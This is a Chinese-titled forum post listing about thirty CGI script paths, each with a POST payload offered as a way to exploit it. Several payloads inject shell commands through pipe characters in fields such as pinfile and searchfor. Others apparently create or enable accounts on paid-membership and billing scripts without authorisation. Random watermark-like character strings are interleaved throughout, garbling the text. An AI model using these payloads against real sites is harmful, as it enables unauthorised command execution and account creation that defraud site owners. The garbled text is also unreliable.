Cgi-bin 30个漏洞＋使用方法

admin

==============================
# n6 w3 O& X  P- h$ O3 ?
/smspass.pl
% r! Q( m$ A2 Q3 W. Zusername=username&password=password

/index.cgi
wei=ren&gen=command
6 D1 l- ], M1 F6 X9 D
/passmaster.cgi
Action=Add&Username=Username&Password=Password
  T/ r, D0 L8 {8 f) Q1 K
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
, [; G, D, {; y
/form.cgi
1 j+ o6 j4 ]& Y" a; d7 r% C% Kname=xxxx&email=email&subject=xxxx&response=|echo;ls|
0 n/ Z8 K4 T4 t/ B$ i
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
: n3 d3 o! M- e: }: ouser=username&pass=Password&confirm=Password
! e! m& s/ @6 H4 I% i6 x& |# m4 M
/ccbill-local.asp
+ k/ N# v' O* e- ~8 Ipost_values=username:password
9 X" T) `- m- c9 ~
; w" z2 J$ o: w% w/count.cgi
/ Y$ K6 u/ [. i" {4 Spinfile=|echo;ls -la;exit|
4 X# O0 Z0 C0 C9 P8 I
/recon.cgi
/recon.cgi?search
& }/ n; t" `" Y. L7 W) ~searchoption=1&searchfor=|echo;ls -al;exit|
) R5 [5 W$ j& q# e1 w/ {
  k8 Z9 ?# W# F3 V/verotelrum.pl
, v& K- Q2 ]0 svercode=username:password:dseegsow:add:amount<&30>
- q7 [5 A0 q1 W8 i
3 Z- W# r) c4 S0 w6 M/af.cgi
+ O: ~; p9 |0 Q6 E_browser_out=|echo;ls -la;exit;|
& V4 J: T) n5 N# v3 `" Y6 h; C
' c- V5 Z# h9 G% u( i- I, q/modify.cgi
* X# I" u) G( M5 J3 M" [. p) o4 Fusername=username&password=password&expire=30
- d4 f5 Y8 L+ R. d+ ]
4 ^8 o( _- q: o7 h/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
cmd=ADD&user=username&pass=password

2 b  c! c8 C% P/ \/probecontrol.cgi
command=enable&username=username&password=password
, T* V+ U& ]2 g  K2 F& _
/recon.cgi
3 w% o7 a6 _5 o& usearchoption=3&searchfor=echo;ls -la;exit
% `& P$ e0 ]0 o! S2 E! g
& U5 z0 y  v! R! E! n/htadd.pl
' O* j1 w, ~/ Rconfigfile=|echo; ls -alt; exit
9 a' d2 i9 C6 V  Q
/gx9passwd.cgi
cmd=ADD&user=username&pass=password

1 @# T! v# G0 {0 P' x/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
0 Y$ D6 Y- h, ?. ]4 H+ U
/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
# l4 _6 t+ C# @5 K% R0 {
- E! H/ \: _0 |( `/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

/usercontrol.cgi
# L7 R' }2 i& B: B4 v+ e) S: W, Tcommand=enable&username=USER&password=PASS

/globoSALErum.cgi
! W; t3 j5 u. i5 v" P6 ]; p6 Haction=ADD&seccode=seccode&login=username&password=password

/addusr.pl
- @3 N8 n: |& @! K  Q1 z0 Uuser=USER&pass=PASS&confirm=PASS
# b; \+ p" {6 n, u
/pincount.cgi
; |8 K& U" e* v8 b6 o! n, [) H/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
6 W6 s: |6 ?, }8 W9 O5 u9 M$ F0 O
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
- ?. o2 ]; G/ h7 s0 t* P0 D2 S* M" Wusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

: A) r, U. W; `$ t  [. P( u/af.cgi
, e  a# U0 D! H  ^. A/env.cgi
ADD+;echo;pwd;exit
5 z  j8 s0 r' \2 R. f9 b) X
/count.cgi
" \4 C" v1 N) E8 y8 npinfile=|echo;pwd;exit|

/recon.cgi
& A5 e) _/ d) C5 C1 Ysearchoption=1&searchfor=|echo;ls%20-al;exit|
  G2 E0 k( Q- [+ {  |: y
& `; ?2 t7 b; Y) c/add.cgi
$ [. w4 y. @. ^0 @, Z( n0 Kusername=username&password=password&expire=30
* Y) u3 b" ~1 Y: z
. a0 c0 Z# a  E$ K, e* e+ g; a==============================
) _: @& z* m8 v; k* l  }6 E